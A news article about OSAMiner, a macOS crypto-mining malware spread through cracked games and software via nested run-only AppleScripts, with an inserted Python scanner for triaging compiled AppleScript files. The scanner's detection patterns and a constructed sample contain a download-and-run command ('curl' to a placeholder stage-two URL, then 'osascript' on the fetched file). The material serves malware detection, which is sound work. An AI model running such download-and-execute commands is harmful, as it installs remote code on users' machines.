MacOS malware with crypto miner remained undiscovered for years


For at least the last five years, macOS users have been targeted by a stealthy malware operation that used a clever trick to stay virtually invisible while hijacking hardware resources on infected machines to mine cryptocurrency.

The malware, named OSAMiner, has been distributed in the wild since at least 2015, disguised in pirated (cracked) games and software such as League of Legends and Microsoft Office for Mac, according to a report published this week by security firm SentinelOne.

OSAMiner has been active for a while and has evolved in recent times, according to a SentinelOne spokesperson.

Not too invisible

From the data collected, it seems that it mostly attacked people in Chinese and Asia-Pacific communities.

However, the crypto miner did not completely avoid detection. In August and September 2018, two Chinese security firms analyzed an older version of the malware. The reports they published, however, were not very detailed and did not capture the full extent of OSAMiner's capabilities.

The reason was that the researchers were unable to retrieve the malware's full code: even at that time, it used nested run-only AppleScript files to deliver its malicious code in several stages.

A very clever malware

When users installed the pirated software, the disguised installers would download and run a run-only AppleScript, which in turn downloaded and ran a second run-only AppleScript, which then ran a third and final one.

Because run-only AppleScripts are delivered in compiled form, without human-readable source code, analysis by security researchers was far from easy.
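The staged, run-only AppleScript chain described above leaves a defender with compiled files rather than readable source. The following Python triage scanner is an added example for this article and is not code from SentinelOne or from the OSAMiner report. It relies on two facts: compiled AppleScript files start with the magic string "FasdUAS", and a script saved as run-only has its source text stripped while literal strings (URLs, paths, command names) survive. The source-keyword check for "looks run-only" is a heuristic assumption, and the sample file contents are constructed, with a placeholder domain.

```python
"""Triage scanner for compiled AppleScript files (added example, not from the article).

Compiled AppleScript (.scpt) files begin with the magic string "FasdUAS".
A normally saved script still embeds its source text; a run-only script has
the source stripped, so only bytecode and literal strings remain. This
scanner flags compiled scripts, estimates whether they look run-only, and
extracts literal strings worth a closer look (URLs, osascript, curl, /tmp/).
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

MAGIC = b"FasdUAS"

# Heuristic assumption: when the source is embedded, common AppleScript
# keywords appear as plain text; their absence suggests a run-only script.
SOURCE_KEYWORDS = (b"tell application", b"on run", b"do shell script", b"end tell")

# Literal strings that survive compilation and are useful triage leads.
SUSPECT_PATTERNS = (
    rb"https?://[\x21-\x7e]+",
    rb"osascript",
    rb"curl ",
    rb"/tmp/",
    rb"launchctl",
)


@dataclass
class Finding:
    path: str
    is_compiled: bool
    looks_run_only: bool
    suspicious: list = field(default_factory=list)


def analyse_bytes(path, data):
    """Classify one file's bytes; only files with the FasdUAS magic are compiled scripts."""
    if not data.startswith(MAGIC):
        return Finding(path, False, False, [])
    has_source = any(k in data for k in SOURCE_KEYWORDS)
    hits = []
    for pat in SUSPECT_PATTERNS:
        for m in re.finditer(pat, data):
            s = m.group(0).decode("latin-1")
            if s not in hits:
                hits.append(s)
    return Finding(path, True, not has_source, hits)


def scan_directory(root, max_bytes=4 * 1024 * 1024):
    """Walk a tree and return findings for every compiled AppleScript found."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            try:
                with open(p, "rb") as f:
                    data = f.read(max_bytes)
            except OSError:
                continue
            finding = analyse_bytes(p, data)
            if finding.is_compiled:
                findings.append(finding)
    return findings


# Constructed samples: a run-only style script whose literals reveal a
# download-and-run stage, a script with embedded source, and a non-script.
SAMPLE_RUN_ONLY = (
    MAGIC + b" 1.101.10\x00" + b"\x00" * 16
    + b"curl -s https://stage2.example.invalid/s.scpt -o /tmp/.stage2\x00"
    + b"osascript /tmp/.stage2\x00"
)
SAMPLE_WITH_SOURCE = (
    MAGIC + b" 1.101.10\x00"
    + b'tell application "Finder" to display dialog "hi"\nend tell\x00'
)
SAMPLE_NOT_SCRIPT = b"#!/bin/sh\necho hello\n"


def demo():
    """Write the constructed samples to a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as d:
        for name, blob in (("a.scpt", SAMPLE_RUN_ONLY),
                           ("b.scpt", SAMPLE_WITH_SOURCE),
                           ("c.sh", SAMPLE_NOT_SCRIPT)):
            with open(os.path.join(d, name), "wb") as f:
                f.write(blob)
        return sorted(scan_directory(d), key=lambda x: x.path)


if __name__ == "__main__":
    for fnd in demo():
        print(os.path.basename(fnd.path), "run-only?", fnd.looks_run_only, fnd.suspicious)
```

On a real macOS host, pair this with `osadecompile`: a script that decompiles is not run-only, while one that refuses confirms the heuristic. The extracted literals are leads for matching against published IOCs, not proof of infection by themselves.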

Phil Stokes, a macOS malware researcher at SentinelOne, published the full attack chain of past and present OSAMiner campaigns together with IOCs (indicators of compromise). The researchers hope this will help crack the mystery around this clever malware.
